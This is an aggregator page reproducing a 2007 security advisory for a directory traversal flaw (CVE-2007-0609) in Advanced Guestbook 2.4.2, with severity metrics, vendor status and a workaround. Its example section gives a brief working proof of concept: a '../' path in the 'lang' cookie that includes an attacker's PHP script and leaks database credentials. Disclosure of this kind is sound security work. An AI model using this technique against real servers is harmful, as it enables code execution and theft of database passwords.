Vulners
Lucene search
ag-traverse.txt
🗓️ 08 May 2007 00:00:00Reported by Jesper JurcenoksType 
packetstorm🔗 packetstormsecurity.com👁 1570 Views
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | Advanced Guestbook index.php lang Cookie Parameter Path Disclosure | 9 May 200700:00 | – | nessus |
 | CVE-2007-0609 | 9 May 200717:00 | – | cve |
 | CVE-2007-0609 | 9 May 200717:00 | – | cvelist |
 | EUVD-2007-0607 | 7 Oct 202500:30 | – | euvd |
 | CVE-2007-0609 | 9 May 200717:19 | – | nvd |
 | Directory traversal | 9 May 200717:19 | – | prion |
 | [Full-disclosure] Advanced Guestbook version 2.4.2 Directory Traversal Vulnerability | 8 May 200700:00 | – | securityvulns |
| Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 8 May 200700:00 | – | securityvulns |
`netVigilance Security Advisory #13
Advanced Guestbook version 2.4.2 Directory Traversal Vulnerability
Description:
Advanced Guestbook is a PHP-based guestbook script. It includes many useful features such as preview, templates, e-mail notification, picture upload, page spanning , html tags handling, smiles, advanced guestbook codes and language support. The admin script lets you modify, view, and delete messages. Requires PHP4 and MySQL.
External References:
Mitre CVE: CVE-2007-0609
NVD NIST: CVE-2007-0609
OSVDB: 33878
Summary:
Advanced Guestbook is a PHP-based guestbook with admin interface.
Security problems in the product allow attackers to conduct directory traversal attacks.
This vulnerabilities can be exploited only when attacker has registered on the same server.
Advisory URL:
http://www.netvigilance.com/advisory0013
Release Date:
05/07/2007
Severity:
Risk: High
CVSS Metrics
Access Vector: Remote
Access Complexity: High
Authentication: Not-required
Confidentiality Impact: Complete
Integrity Impact: Complete
Availability Impact: Complete
Impact Bias: Normal
CVSS Base Score: 8
Target Distribution on Internet: Low
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated
Vulnerability Impact: Attack
Host Impact: Directory Traversal
SecureScout Testcase ID:
Vulnerable Systems:
Advanced Guestbook 2.4.2
Vulnerability Type:
An attacker via the .. (dot dot) sequence can execute his own php-script on the target server.
Vendor Status:
Contact with the Vendor was established but draft of the security advisory wasn't provided because the Vendor stopped responding to our emails on 9 March 2007. There is no official fix at the release of this Security Advisory
Workaround:
Set Advanced Guestbook default static language.
Example:
1. Create php-script like: <?php global $GB_DB; print_r($GB_DB); ?>
2. Set in COOKIES variable lang = "[ via the .. (dot dot) Sequence set the script name on the same server]" for example "../../../hack_www/htdocs/hack"
REQUEST:
http://[TARGET]/[guestbook-directory]/index.php
REPLY:
Array
(
[dbName] => [CURRENT DB NAME]
[host] => [CURRENT DB HOST]
[user] => [DB USER NAME]
[pass] => [DB USER PASSWORD]
)
Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 May 2007 00:00Current
6.7Medium risk
Vulners AI Score6.7
EPSS0.10254